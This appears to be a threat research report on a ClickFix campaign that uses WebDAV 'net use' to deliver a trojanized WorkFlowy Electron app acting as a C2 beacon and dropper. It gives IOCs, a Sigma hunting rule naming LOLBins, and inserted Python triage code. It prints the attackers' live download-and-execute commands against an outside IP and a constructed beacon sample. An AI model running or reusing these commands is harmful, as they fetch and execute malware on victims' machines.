Disclaimer: This report has been prepared by the Threat Research Center to raise cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.
Summary
Atos researchers identified a new variant of the popular ClickFix technique, in which attackers persuade the user to execute a malicious command on their own device via the Win + R shortcut. In this variation, a "net use" command is used to map a network drive from an external server, and a ".cmd" batch file hosted on that drive is then executed. The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside its ".asar" archive. This acts as a C2 beacon and a dropper for the final malware payload.
Figure 1: High-level overview of attack flow.
Attack overview
In this version, the initial attack vector is the same as in all the other ones: a web page posing as a captcha mechanism, "happyglamper[.]ro". It prompts the user to open the Run dialog via "Win+R", followed by "Ctrl+V" and "Enter".
Figure 2: Phishing website 1
Figure 3: Phishing website 2
This executes the following command:

```batch
"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete
```

Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, "net use" is used to map and connect to a network drive on an external server, from which a batch script is executed. While not novel, these TTPs had never been seen in ClickFix attacks before. Combined with the unusual subsequent stages of the infection chain, this campaign gives adversaries a high chance of evading defensive controls and staying under the radar of defenders.
In this case, the observed ClickFix execution flow successfully bypassed detection by Microsoft Defender for Endpoint. Atos security teams were able to detect it only thanks to the internal Threat Hunting service, which focuses on the main behavioral aspect of the ClickFix technique: initial execution via the RunMRU registry key (the hunting query is available in the Appendix section).
The initial execution script "update.cmd" is loaded from the mapped drive and executed; after that, the mapped drive is removed. Content of "update.cmd":

```batch
start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'http://94.156.170[.]255/flowy.zip' -OutFile "$env:TEMP\dl.zip";
Expand-Archive "$env:TEMP\dl.zip" -DestinationPath "$env:LOCALAPPDATA\MyApp" -Force;
Start-Process "$env:LOCALAPPDATA\MyApp\WorkFlowy.exe""
```

This spawns a PowerShell instance which downloads a ZIP archive and extracts it into the "%LOCALAPPDATA%\MyApp" directory. It then executes the "WorkFlowy.exe" binary.
Figure 4: Content of flowy.zip archive
WorkFlowy analysis
The archive contains a WorkFlowy desktop application (version 1.4.1050), signed by the developer "FunRoutine Inc." and distributed as an Electron application bundle. Electron applications are written using popular web technologies – HTML, CSS, and JavaScript – and use ".asar" archives to pack their source code during application packaging. This is done for various reasons, such as mitigating issues around long path names on Windows. The malicious code was injected into main.js, the Node.js entry point of the app, hidden inside the app.asar archive.
Technical Profile
| Property | Value |
|---|---|
| Target application | WorkFlowy Desktop (Electron) |
| Malicious version | 1.4.1050 |
| Malicious file | resources/app.asar → /main.js |
| C2 domain | cloudflare.report/forever/e/ |
| C2 origin IP | 144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud) |
| Domain registered | January 2026, HK registrant, OnlineNIC registrar |
| Victim ID file | %APPDATA%\id.txt |
| Dropper staging dir | %TEMP%\[unix_timestamp] |
Infection Vector
The malicious ASAR archive is a direct replacement for the legitimate resources/app.asar. The attacker repackaged an older version of the app (v1.4 vs. the current v4.3) with injected code.
Figure 5: Content of "resources" subdirectory
Malicious Code (Dropper/Beacon)
When WorkFlowy is executed, it looks for the app.asar file at the relative path hardcoded into the binary. It then reads the main.js file from inside the archive, decodes it to a string, and passes it to the embedded Google V8 JavaScript engine, which executes it. The attackers replaced the legitimate main.js with one they created themselves. Instead of well-structured scripts, they used a heavily obfuscated one-liner structure, placing the malicious code on top of the legitimate code so that it executes first and blocks WorkFlowy's functionality.
Malicious code contains several critical functions:
- Malware executes before the legitimate application starts: The injected IIFE opens with await f() — the infinite C2 beacon loop. Because f() never resolves, all legitimate WorkFlowy initialization code that follows is permanently blocked. The malware runs with full Node.js privileges immediately on launch.
- Persistent victim fingerprinting via %APPDATA%\id.txt: A random 8-character alphanumeric ID is generated on first run and written to %APPDATA%\id.txt. On subsequent runs, the stored ID is read back, giving the attacker a stable identifier for each victim machine across sessions.
- C2 beacon — exfiltrates host identity every 2 seconds: Function u() sends an HTTP POST containing the victim’s unique ID, machine name, and Windows username to the C2 server. The loop in f() repeats this indefinitely with a 2-second interval.
- Remote payload download and execution: Function p() receives a task object from the C2, decodes base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes any .exe via child_process.exec.
If the C2 connection is not established, no files or directories are generated. At the time of this analysis, the C2 domain was already unresponsive.
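Because ASAR archives are rarely inspected, the triage step a defender wants is to read main.js straight out of app.asar and score it for the dropper traits listed above. The following is an added example, not code from this report or from WorkFlowy: it implements the ASAR layout (8-byte size prefix, pickled JSON index, raw file data) for both writing a constructed sample and reading it back, and the indicator regexes, threshold and the two sample scripts are assumptions chosen for illustration.

```python
import json
import re
import struct

# Heuristics for the traits described above: C2 URL, host fingerprint, base64 payload, child_process, id.txt.
INDICATORS = {
    "spawns_process": r"child_process|\bexec(Sync)?\s*\(",
    "decodes_base64": r"Buffer\.from\([^)]*['\"]base64['\"]",
    "reads_host_identity": r"os\.(hostname|userInfo)\s*\(",
    "hardcoded_url": r"https?://[\w.\-]+/",
    "victim_id_file": r"id\.txt",
}

def pack_asar(files):
    """Build a minimal ASAR: 8-byte size prefix, pickled JSON index, then raw file data."""
    index, blobs, offset = {}, [], 0
    for name, data in files.items():
        index[name] = {"size": len(data), "offset": str(offset)}
        blobs.append(data)
        offset += len(data)
    hdr = json.dumps({"files": index}).encode()
    padded = hdr + b"\0" * (-len(hdr) % 4)           # pickle strings are 4-byte aligned
    pickle = struct.pack("<II", 4 + len(padded), len(hdr)) + padded
    return struct.pack("<II", 4, len(pickle)) + pickle + b"".join(blobs)

def read_asar_entry(blob, path):
    """Return one entry's bytes (e.g. 'main.js') without extracting the archive."""
    header_size = struct.unpack_from("<I", blob, 4)[0]
    json_len = struct.unpack_from("<I", blob, 12)[0]
    node = json.loads(blob[16:16 + json_len])
    for part in path.split("/"):                     # walk nested 'files' dicts
        node = node["files"][part]
    start = 8 + header_size + int(node["offset"])    # file data follows the header
    return blob[start:start + node["size"]]

def triage_main_js(src):
    """Map each indicator name to whether it occurs in the script source."""
    return {name: bool(re.search(pat, src)) for name, pat in INDICATORS.items()}

def is_suspicious(blob, threshold=3):
    """Flag an archive whose main.js shows at least `threshold` indicators."""
    hits = triage_main_js(read_asar_entry(blob, "main.js").decode("utf-8", "replace"))
    return sum(hits.values()) >= threshold, hits

# Constructed samples (not the real main.js): a normal Electron entry and a non-functional sketch; URL is a placeholder.
CLEAN = b'const {app, BrowserWindow} = require("electron");\napp.whenReady().then(() => new BrowserWindow());'
TAINTED = (b'(async()=>{const os=require("os"),cp=require("child_process");'
           b'const idPath=process.env.APPDATA+"\\\\id.txt";const beacon="https://c2.example.invalid/";'
           b'const body=JSON.stringify({host:os.hostname(),user:os.userInfo().username});'
           b'const data=Buffer.from(task.file,"base64");cp.exec(exePath);})();')
```

Run `is_suspicious(open("resources/app.asar", "rb").read())` against a real bundle; the tuple returned carries the per-indicator hits so an analyst can see why an archive was flagged.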
Why Electron is an Effective Delivery Mechanism
The malicious code runs in the Node.js main process – outside the Chromium sandbox – with the full privileges of the logged-in user, allowing the malicious code to perform any action the user is allowed to perform on the system. No files are actually written to disk, and since the malicious payload is packed inside the ".asar" archive, this additionally helps to hide the malicious code.
Persistence
No OS-level persistence is implemented via the dropper. The beacon runs only while WorkFlowy is open. The only artifact written to disk before next stage delivery is %APPDATA%id.txt (victim tracking ID), and that is only if the connection to C2 is established correctly. Presumably, an OS-level persistence is delegated to whatever payload the C2 delivers via the dropper.
Key takeaways
This ClickFix variant is significant because it moves initial access away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net use to abuse WebDAV as a delivery mechanism. Previous ClickFix campaigns typically exposed themselves by directly invoking interpreters or living-off-the-land binaries that are heavily monitored by modern EDR solutions. In contrast, this iteration mounts a remote WebDAV share as a local drive, executes a hosted batch file through standard filesystem semantics, and removes the mapping immediately after use. This shows that ClickFix still evolves, expanding its arsenal of proxy execution methods and starting to utilize native networking utilities.
The malicious logic is hidden by replacing the content of the WorkFlowy application's app.asar archive with a trojanized version of main.js. Because the code runs inside the Electron main process and remains packaged within a legitimate application, it avoids many file-based and behavioral detections that focus on standalone loaders or script interpreters. ASAR archives are rarely inspected, allowing the dropper logic to execute through normal application startup with minimal visibility.
This activity was not detected by security controls and was only identified through targeted threat hunting at Atos. Detection relied on analyzing execution context rather than payload indicators, specifically hunting for suspicious command execution originating from the Explorer Run dialog (recorded inside the RunMRU Registry Key). This underscores the growing importance of threat hunting as a complementary detection mechanism: as ClickFix campaigns shift toward native utilities and trusted applications that generate few alerts, only proactive, hypothesis-driven hunting can help surface these weak signals early enough to disrupt the attack chain.
Appendix
IOCs
| Type | Indicator |
|---|---|
| Domain | cloudflare[.]report |
| Domain | happyglamper[.]ro |
| IP | 94[.]156[.]170[.]255 |
| IP | 144[.]31[.]165[.]173 |
| URL | https://cloudflare[.]report/forever/e/ |
| File | %APPDATA%\id.txt |
| Path | %TEMP%\[13-digit-timestamp] |
| SHA256 | a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar) |
| SHA256 | 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe – older version of the legitimate binary, not malicious) |
| SHA256 | dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (main.js) |
Hunting Query
```yaml
title: Suspicious Commands executed via Run dialog
id: 20891a30-032e-4f15-a282-fa4a8b0d8aae
status: experimental
description: |
  Detects suspicious command interpreters and LOLBins written into the Explorer RunMRU registry key
  (commonly used for Run dialog history), with explorer.exe as the initiating process.
author: TRC
date: 2026-03-05
tags:
  - attack.execution
  - attack.t1059
  - attack.defense_evasion
logsource:
  category: registry_set
  product: windows
  definition: "Sysmon Event ID 13 (Registry value set) or equivalent EDR registry telemetry"
detection:
  selection_key:
    TargetObject|contains: 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
  selection_proc:
    Image|endswith: 'explorer.exe'
  selection_data:
    Details|contains:
      - 'cmd '
      - 'powershell '
      - 'cmd.exe '
      - 'powershell.exe '
      - 'wscript.exe '
      - 'cscript.exe '
      - 'net.exe '
      - 'net1.exe '
      - 'sh.exe '
      - 'bash.exe '
      - 'schtasks.exe '
      - 'regsvr32.exe '
      - 'hh.exe '
      - 'wmic.exe '
      - 'mshta.exe '
      - 'rundll32.exe '
      - 'msiexec.exe '
      - 'forfiles.exe '
      - 'scriptrunner.exe '
      - 'mftrace.exe '
      - 'AppVLP.exe '
      - 'svchost.exe '
      - 'msbuild.exe '
  condition: selection_key and selection_proc and selection_data
falsepositives:
  - "Legitimate administrative activity using Run dialog (Win+R) to execute built-in tools."
  - "IT scripts or troubleshooting steps executed interactively by a user."
level: medium
```
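To see what the hunting rule actually fires on, here is an added example (not part of this report) that evaluates the rule's three selections over constructed Sysmon Event ID 13 records, including the ClickFix command exactly as reproduced above. The event shapes, the shortened token list and the `QUOTED_TOKENS` variant are assumptions: because the command opens with a quoted `"cmd.exe"`, none of the rule's space-terminated tokens are substrings of it, which the quote-tolerant variant addresses.

```python
# Constructed Sysmon Event ID 13 records (not real telemetry) used to exercise the
# hunting rule above; Sigma's |contains is a case-insensitive substring test.
RUNMRU_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
TOKENS = ["cmd ", "powershell ", "cmd.exe ", "powershell.exe ", "wscript.exe ",
          "cscript.exe ", "net.exe ", "net1.exe ", "mshta.exe ", "rundll32.exe ",
          "regsvr32.exe ", "msiexec.exe ", "schtasks.exe ", "wmic.exe "]
# Assumption (not in the rule): also accept a quoted binary such as "cmd.exe" /c ...
QUOTED_TOKENS = TOKENS + [t.rstrip() + '"' for t in TOKENS]

def rule_matches(event, tokens=TOKENS):
    """selection_key and selection_proc and selection_data, as the rule's condition states."""
    details = event["Details"].lower()
    return (RUNMRU_KEY.lower() in event["TargetObject"].lower()
            and event["Image"].lower().endswith("explorer.exe")
            and any(tok in details for tok in tokens))

def make_event(details, image=r"C:\Windows\explorer.exe", slot="a"):
    """One RunMRU write; Explorer stores each Run entry as '<command>\\1'."""
    return {"EventID": 13, "Image": image, "Details": details,
            "TargetObject": r"HKU\S-1-5-21-X\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\%s" % slot}

def hunt(events, tokens=TOKENS):
    """Return the Details of every event the rule fires on."""
    return [e["Details"] for e in events if rule_matches(e, tokens)]

# The ClickFix command as reproduced in this report (IP left defanged on purpose).
CLICKFIX = make_event(r'"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete\1')
ADMIN = make_event(r"powershell -File C:\tools\fix.ps1\1", slot="b")
BENIGN = make_event(r"notepad.exe\1", slot="c")
OTHER_PROC = make_event(r"cmd /c whoami\1", image=r"C:\Windows\System32\cmd.exe")
```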